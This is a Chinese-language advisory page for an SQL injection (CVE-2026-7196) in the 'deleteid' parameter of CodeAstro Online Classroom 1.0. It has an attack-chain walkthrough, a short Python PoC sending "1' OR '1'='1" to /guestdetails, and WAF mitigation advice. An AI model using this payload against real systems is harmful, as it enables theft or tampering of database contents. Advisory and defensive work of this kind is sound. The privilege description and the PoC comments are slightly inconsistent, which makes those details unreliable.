CVE-2026-7196 CVSS 6.3 中危

CVE-2026-7196: CodeAstro Online Classroom SQL注入漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7196

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

CodeAstro Online Classroom

漏洞概述

CodeAstro Online Classroom 1.0 版本存在一处安全漏洞。该漏洞位于 /guestdetails 文件中，因未对 'deleteid' 参数进行有效过滤，导致发生 SQL 注入。攻击者无需特殊权限即可远程利用此缺陷，通过构造恶意 SQL 语句操纵数据库查询。鉴于利用代码已公开披露，该漏洞可能导致敏感数据泄露或数据被篡改，对系统的机密性、完整性和可用性构成中等威胁，建议管理员立即采取措施。

技术细节

该漏洞属于典型的 SQL 注入漏洞，源于应用程序在处理用户输入时存在严重的逻辑缺陷。在 CodeAstro Online Classroom 1.0 的 /guestdetails 接口处理逻辑中，程序直接接收用户提交的 'deleteid' 参数，并将其拼接到 SQL 查询语句中执行，未进行任何安全过滤、转义或参数化处理。这种不安全的编码方式破坏了查询语句的原始结构，使得攻击者能够注入恶意的 SQL 代码片段。根据 CVSS 向量分析，攻击复杂度低（AC:L），无需用户交互（UI:N），且仅需低权限即可发起攻击（PR:L）。攻击者通过发送特制的 HTTP POST 或 GET 请求，可诱导后端数据库执行非预期的 SQL 命令，例如利用布尔盲注提取数据、使用 UNION SELECT 查询管理员密码哈希，甚至通过堆叠查询执行破坏性操作。鉴于漏洞利用代码已公开，该风险显著增加。

攻击链分析

STEP 1

侦察

攻击者识别出目标运行的是 CodeAstro Online Classroom 1.0，并确认存在 /guestdetails 接口。

STEP 2

探测

攻击者向 /guestdetails 发送包含特殊字符（如单引号）的 'deleteid' 参数，测试是否存在 SQL 语法错误或异常响应。

STEP 3

利用

攻击者构造恶意 SQL 注入载荷（如 UNION SELECT 或布尔盲注语句），通过修改 'deleteid' 参数发送请求，操纵后端数据库查询逻辑。

STEP 4

达成目标

成功注入后，攻击者提取敏感信息（如用户名、密码），修改数据库内容，或在某些情况下执行系统命令。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_sqli(url):
    target_url = f"{url}/guestdetails"
    # Payload to test SQL Injection based on vulnerability description
    # Using a simple logical test to check if the database sleeps or returns true
    payload = {
        "deleteid": "1' OR '1'='1"
    }
    
    try:
        response = requests.post(target_url, data=payload, timeout=5)
        # Analyze response to determine vulnerability confirmation
        if response.status_code == 200:
            print(f"[+] Potential SQL Injection found at {target_url}")
            print(f"[+] Response length: {len(response.text)}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[!] Error occurred: {e}")

if __name__ == "__main__":
    target = "http://localhost"  # Replace with actual target
    check_sqli(target)

影响范围

CodeAstro Online Classroom 1.0

防御指南

临时缓解措施

在无法立即升级或修复代码的情况下，建议在 Web 应用防火墙（WAF）中部署规则，拦截针对 /guestdetails 接口的异常 SQL 语法请求（如包含单引号、OR 1=1、UNION SELECT 等特征的流量），并限制对受影响接口的访问权限。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7196
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7196
3 Details https://www.cvedetails.com/cve/CVE-2026-7196/
4 VulDB https://vuldb.com/cve/CVE-2026-7196
5 Link https://codeastro.com/
6 Link https://github.com/xue-p123/vuldb-research/issues/3
7 Link https://vuldb.com/submit/801030
8 Link https://vuldb.com/vuln/359799
9 Link https://vuldb.com/vuln/359799/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表